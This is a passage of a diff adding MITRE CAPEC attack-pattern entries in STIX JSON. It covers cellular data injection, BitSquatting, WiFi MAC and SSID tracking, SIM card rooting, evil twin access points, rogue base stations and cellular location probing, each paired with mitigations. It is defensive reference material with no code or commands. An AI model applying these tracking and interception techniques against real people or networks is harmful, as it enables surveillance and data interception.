"attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cellular Data Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Attackers can disrupt or deny mobile technology communications and operations.)", + "Modify Data (Attackers can inject false data 
into data or signaling system data flows of communications and operations, or re-route data flows or signaling data for the purpose of further data intercept and capture.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "High": "Often achieved by nation states in conjunction with commercial cellular providers to conduct cellular traffic intercept and possible traffic injection." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology to detect and alert to any attempts to modify mobile technology data flows or to inject new data into existing data flows and signaling data.", + "id": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-610-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4bbed6d4-6c57-4da2-ad62-002452b7960c", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24c2c0ad-9606-42ff-bdd0-8c0cb09d28a2", + "target_ref": "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary registers a domain name one bit different than a trusted domain. 
A BitSquatting attack leverages random errors in memory to direct Internet traffic to adversary-controlled destinations. BitSquatting requires no exploitation or complicated reverse engineering, and is operating system and architecture agnostic. Experimental observations show that BitSquatting popular websites could redirect non-trivial amounts of Internet traffic to a malicious entity.", + "external_references": [ + { + "external_id": "CAPEC-611", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/611.html" + }, + { + "description": "Artem Dinaburg, Bitsquatting: DNS Hijacking without exploitation, Raytheon", + "external_id": "REF-485", + "source_name": "reference_from_CAPEC", + "url": "http://media.blackhat.com/bh-us-11/Dinaburg/BH_US_11_Dinaburg_Bitsquatting_WP.pdf" + } + ], + "id": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "BitSquatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful BitSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target website: The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.

  2. Techniques
    Research popular or high traffic websites.

Experiment

  1. Impersonate trusted domain: In order to impersonate the trusted domain, the adversary needs to register the BitSquatted URL.

  2. Techniques
    Register the BitSquatted domain.

Exploit

  1. Wait for a user to visit the domain: Finally, the adversary simply waits for a user to be unintentionally directed to the BitSquatted domain.

  2. Techniques
    Simply wait for an error in memory to occur, redirecting the user to the malicious domain.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL’s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate all servers and perform redundant checks when using DNS hostnames.", + "id": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0d8b1972-e844-4991-a884-ca3e967a6e8d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0348be-410d-4fe9-bf0e-bb5e48d5af8b", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", + "id": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-611-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": 
"3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70115677-16f7-4e4f-9e75-85108f13258f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc9894cb-c83c-4f22-8ef6-9a2a3187b948", + "target_ref": "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-612", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/612.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "WiFi MAC Address Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + 
"Communications", + "Software" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and several commercial advertising companies routinely set up tools to collect and monitor MAC addresses." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Automatic randomization of WiFi MAC addresses", + "id": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ada034dd-bae1-45e0-992d-43931ede09d7", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a9dbae9-4209-42ff-bcb4-52af76ceb770", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of handset and retransmission device", + "id": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-612-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"id": "relationship--42428530-f329-4129-baf4-f136e130d080", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--520b5a77-564b-4186-aadd-6e795b0bb798", + "target_ref": "attack-pattern--d49fca9f-7eb0-4c1b-b2e6-c27119e5268e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.", + "external_references": [ + { + "external_id": "CAPEC-613", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/613.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "modified": "2019-09-30T00:00:00.000Z", + "name": "WiFi SSID Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + 
"None" + ], + "x_capec_skills_required": { + "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not enable the feature of \"Hidden SSIDs\" (also known as \"Network Cloaking\") – this option disables the usual broadcasting of the SSID by the access point, but forces the mobile handset to send requests on all supported radio channels which contains the SSID. The result is that tracking of the mobile device becomes easier since it is transmitting the SSID more frequently.", + "id": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54e6bbee-8421-4ac9-ab72-d13af56bbbca", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1ca11f-4c92-41c1-84e6-0f6af4787884", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequently change the SSID to new and unrelated values", + "id": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-613-1", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf4d3c7-8a07-460e-866b-2475c9ee85bb", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22c53c7d-593e-4ede-b12d-dad35f67f7e3", + "target_ref": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SIM cards are the de facto trust anchor of mobile devices worldwide. The cards protect the mobile identity of subscribers, associate devices with phone numbers, and increasingly store payment credentials, for example in NFC-enabled phones with mobile wallets. This attack leverages over-the-air (OTA) updates deployed via cryptographically-secured SMS messages to deliver executable code to the SIM. By cracking the DES key, an attacker can send properly signed binary SMS messages to a device, which are treated as Java applets and are executed on the SIM. These applets are allowed to send SMS, change voicemail numbers, and query the phone location, among many other predefined functions. 
These capabilities alone provide plenty of potential for abuse.", + "external_references": [ + { + "external_id": "CAPEC-614", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/614.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "description": "Karsten Nohl, Rooting SIM Cards, Security Research Labs", + "external_id": "REF-486", + "source_name": "reference_from_CAPEC", + "url": "https://srlabs.de/rooting-sim-cards/" + } + ], + "id": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Rooting SIM Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c9e7b88-a1eb-4cfd-aa34-10df08b23317" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "A SIM card that relies on the DES cipher." + ], + "x_capec_skills_required": { + "Medium": "This is a sophisticated attack, but detailed techniques are published in open literature." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.", + "id": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-614-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73c5c39c-480b-411a-8be5-0ffe26aedee8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49c4d0f1-127a-4f39-943e-6ee56dcac7d2", + "target_ref": "attack-pattern--b974175d-c76a-4168-af55-ea0cb0695286", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries install Wi-Fi equipment that acts as a legitimate Wi-Fi network access point. When a device connects to this access point, Wi-Fi data traffic is intercepted, captured, and analyzed. 
This also allows the adversary to use \"adversary-in-the-middle\" (CAPEC-94) for all communications.", + "external_references": [ + { + "external_id": "CAPEC-615", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/615.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + } + ], + "id": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evil Twin Wi-Fi Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control Wi-Fi data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Commercial defensive technology that monitors for rogue Wi-Fi access points, adversary-in-the-middle attacks, and anomalous activity with the mobile device baseband radios.", + "id": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-615-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6566c16f-35b1-476c-b9e5-0399cc905c82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3cd5d16f-646e-42e0-b22d-2a14d4bec7b1", + "target_ref": "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary provides a malicious version of a resource at a location that is similar to the expected location of a legitimate resource. After establishing the rogue location, the adversary waits for a victim to visit the location and access the malicious resource.", + "external_references": [ + { + "external_id": "CAPEC-616", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/616.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Establish Rogue Location", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks of this nature can result in a wide variety of consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ], + "Integrity": [ + "Other (Successful attacks of this nature can result in a wide variety of 
consequences and negatively impact confidentiality and integrity based on the adversary's subsequent actions.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--bc008240-e0e0-4b97-9dbd-ffaba4c519b5", + "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36" + ], + "x_capec_prerequisites": [ + "A resource is expected to available to the user." + ], + "x_capec_skills_required": { + "Low": "Adversaries can often purchase low-cost technology to implement rogue access points." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker imitates a cellular base station with their own \"rogue\" base station equipment. Since cellular devices connect to whatever station has the strongest signal, the attacker can easily convince a targeted cellular device (e.g. 
the retransmission device) to talk to the rogue base station.", + "external_references": [ + { + "external_id": "CAPEC-617", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/617.html" + } + ], + "id": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cellular Rogue Base Station", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", + "id": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-617-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c58917b8-55ad-4997-bfa1-356553087aa1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "target_ref": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. 
By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", + "external_references": [ + { + "external_id": "CAPEC-618", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/618.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "description": "Denis Foo Kune, John Koelndorfer, Nicholas Hopper, Yongdae Kim, Location Leaks on the GSM Air Interface, University of Minnesota", + "external_id": "REF-487", + "source_name": "reference_from_CAPEC", + "url": "https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf" + } + ], + "id": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Broadcast Message Request", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_consequences": { + "Other": [ + "Other (An attacker could verify that the target is in (or not in) a given location.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The attacker must have knowledge of the target’s mobile phone number." + ], + "x_capec_skills_required": { + "Low": "Open source and commercial tools are available for this attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of mobile number.", + "id": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-618-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--79aff368-471d-46f4-803b-6584f3497601", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "target_ref": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. 
Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", + "external_references": [ + { + "external_id": "CAPEC-619", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/619.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--d900a0ea-7dd6-4ed8-a1bf-ac498e68d9e5", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Signal Strength Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_skills_required": { + "Low": "Commercial tools are available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 